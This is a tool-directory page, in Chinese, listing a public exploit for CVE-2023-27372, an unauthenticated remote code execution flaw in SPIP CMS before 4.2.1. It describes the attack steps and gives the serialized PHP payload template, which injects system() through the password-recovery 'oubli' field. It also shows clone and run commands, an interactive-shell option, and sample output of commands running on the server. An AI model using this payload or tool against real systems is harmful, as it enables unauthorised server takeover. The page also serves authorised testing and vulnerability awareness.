Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-27372 — CVE-2023-27372 的漏洞利用,带交互式 shell | Kitploit
工具/GitHubGitHub/scriniariii/cve-2023-27372
漏洞分析代码分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubscriniariii/cve-2023-27372

CVE-2023-27372

CVE-2023-27372 的漏洞利用,带交互式 shell

查看仓库
15个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-27372 漏洞利用

针对 CVE-2023-27372 的漏洞利用程序,这是 SPIP CMS 中一个无需认证的远程代码执行漏洞,影响 4.2.1 之前的版本。

⚠️ 仅供教育使用。 请仅对您拥有或已获得明确书面许可的系统进行测试。未经授权的使用属于违法行为。


概述

SPIP 是一个广泛用于 Web 发布的开源 CMS。该漏洞存在于密码找回表单(/spip.php?page=spip_pass)中,其中 oubli 参数未经适当净化即被处理,允许攻击者在服务器上注入并执行任意 PHP 代码——无需任何认证。

字段详情
CVECVE-2023-27372
CVSS 评分9.8(严重)
攻击向量网络
认证无需认证
受影响版本SPIP < 4.2.1
漏洞类型代码注入 / 未认证 RCE

工作原理

  1. 获取 CSRF 令牌 — 向 /spip.php?page=spip_pass 发送 GET 请求,从 HTML 表单中提取 formulaire_action_args 令牌。

  2. 构建载荷 — 构造一个包含待执行命令的 PHP 序列化字符串:

    root@kitploit:~
    s:N:"<?php system('COMMAND'); ?>";
    

    其中 N 是内部 PHP 字符串的确切字节长度。

  3. 发送载荷 — 通过 POST 请求将构造好的载荷与 CSRF 令牌一并提交到 oubli 字段。SPIP 未经净化便处理该字段并执行注入的 PHP 代码。

  4. 提取输出 — 命令输出会随 HTML 响应返回,并从 oubli 输入字段的 value 属性中解析出来。

环境要求

  • Python 3.x
  • requests
  • beautifulsoup4
  • argparse
  • regex

安装

root@kitploit:~

git clone https://github.com/scriniarii/CVE-2023-27372

cd CVE-2023-27372

pip install requests beautifulsoup4

用法

root@kitploit:~
python3 exploit.py -u <URL> -c <command>
参数说明
-u, --url目标 SPIP 实例的基础 URL
-c,

示例

root@kitploit:~

python3 exploit.py -u http://TARGET/ -c "id"
root@kitploit:~

python3 exploit.py -u http://TARGET/ -s

预期输出:

root@kitploit:~
[+] Token found : JWDCxt5PTFzhPb...
 
[+] Output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

受影响版本

要检查目标的 SPIP 版本,请查看 HTML 中的 meta generator 标签:

root@kitploit:~
<meta name="generator" content="SPIP 4.2.0" />

[!CAUTION]
⚠️ 免责声明
请仅将我的代码仓库中提供的信息和漏洞利用程序用于教育目的和负责任的信息披露。对于因使用这些工具、脚本或漏洞利用程序而造成的任何误用或损害,我概不负责。

下载工具
--command
要在目标上执行的系统命令
-s, --shell交互式 Shell